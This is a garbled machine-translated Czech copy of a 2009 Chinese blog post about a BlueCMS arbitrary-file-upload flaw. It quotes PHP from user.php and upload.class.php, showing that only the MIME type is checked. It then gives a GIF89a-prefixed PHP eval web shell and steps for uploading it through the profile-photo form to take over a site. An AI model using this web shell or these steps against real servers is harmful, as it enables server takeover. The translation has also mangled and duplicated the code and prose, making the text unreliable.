bluecms 0den-0 dnů, bluecms, bluecms 0 dnů, php, upload, soubor hlavy st0p 's blog

bluecms 0 dny

Tento záznam byl zaslán Říjen 07 2009

: St0p
Reprodukovat uveďte zdroj: http://www.st0p.org

Poznámka: Omlouváme se, ale verze ranní vlasů v noci volal duální do novin 0day, informován a prostě jít na oficiální podíval, a vydala opravu zabezpečení brzy ah .. můžete jít on-line není aktualizovaná verze testu ...

Bohužel, skupina A můj kamarád dělal CMS, řekl uživatelská data upravit některé mohou být aplikován, říká analýza, s lokálně instalované po, není možné použít jednoduché uvozovky jsou unikl magic_quotes_gpc = off. . .

Viz include / common.inc.php linku, vzdát. .

  ......
  ! get_magic_quotes_gpc ( ) ) if (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST = Deep_addslashes ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = ($ _GET Deep_addslashes);
 	 deep_addslashes ( $_COOKIES ) ; Kč _COOKIES = Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; Kč _REQUEST = ($ _REQUEST Deep_addslashes);
  }
 ......

Možná st0p štěstí, viz nahrát fotografie částí, analýza kódu, použít něco najít v user.php. .

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. "include / upload.class.php '); / / volání třídy nahrávání
     new upload ( ) ; $ Image = new upload ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { if (isset ($ _FILES ['face_pic'] ['error']) && $ _FILES ['face_pic'] ['error'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ $ = Face_pic obrázek -> img_upload ($ _FILES ['face_pic'], 'face_pic'); 
                          / / Nezjistila příponu přímo do, bude třída schopni přenést SHELL
	 }

Otevřete include / upload.class.php pouze k detekci hlavičku souboru nerozpozná příponu

 upload { private $allow_image_type = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; ...... function img_upload ( $file , $dir = '' , $imgname = '' ) { if ( empty ( $dir ) ) { $dir = BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; } else { $dir = BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; } if ( ! file_exists ( $dir ) ) { if ( ! mkdir ( $dir ) ) { showmsg ( '上传过程中创建目录失败' ) ; } } if ( empty ( $imgname ) ) { $imgname = $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; } $imgname = $dir . $imgname ; if ( ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { //只是检测了文件头部来着，那我们就直接构造一个SHELL就好了 showmsg ( '不允许的图片类型' ) ; } } Třídy ...... nahrávání {private $ allow_image_type = array ("image / jpg ',' image / gif ',' image / png ',' image / pjpeg '); ...... funkce img_upload ($ file, $ dir ='', $ imgname ='') {if (empty ($ dir)) {$ dir = BLUE_ROOT Nahrávání dat date ("Ym") "/"; týden..} else {$ dir = BLUE_ROOT Nahrávání dat $ dir "/.".} if (file_exists ($ dir)) {if (mkdir ($ dir)!) {showmsg (dále jen "proces nahrávání Nepodařilo se vytvořit adresář ');}} if (empty ($ imgname)) {$ imgname = $ this -> create_tempname () $ this -> get_type ($ file ['name']);.} $ imgname = $ dir $ imgname if (in_array ($.! soubor ["typ"], $ this -> allow_image_type)) {/ / jen pro detekci hlavičku souboru s, jsme přímo postavit SHELL jako showmsg z obrázku ('není povoleno ");}}

Výše uvedené výjimkou st0p.php

2	GIF89a ( $_POST [ st0p ] ) ; ?> <PHP eval ($ _POST [st0p]);?>

Poznámka sítě účet přihlášení, člen -> můj profil, pak nahrát nový obrázek do voleb jsme vybudovali PHP souboru, přejděte na potvrzení upravit, zobrazit adresa je úspěšný, klepněte pravým tlačítkem myši na fotografii přímo na trati. . Slovo SHELL úspěšně nahrán!

Analýza je dokončena, doufám, že další výměna, problém tyto věci jen chcete splnit několik přátel společně diskutovat o technologii, nastavit skupinu stejně, jen obyčejná skupina, jen 100 lidí, vyčistit, nikdy se mluví byl těžce naložené B chaos T, deprese, je otevřená skupina pro výměnu a nemluví se symbol v místě, chtějí k pokroku, může jít stranou silnice!
Pokud si do skupiny jen proto, aby výsledky jednání jiných, z jiných, nevím zaplatit, nebo se jen přijít potápění, nebo bez něj. . .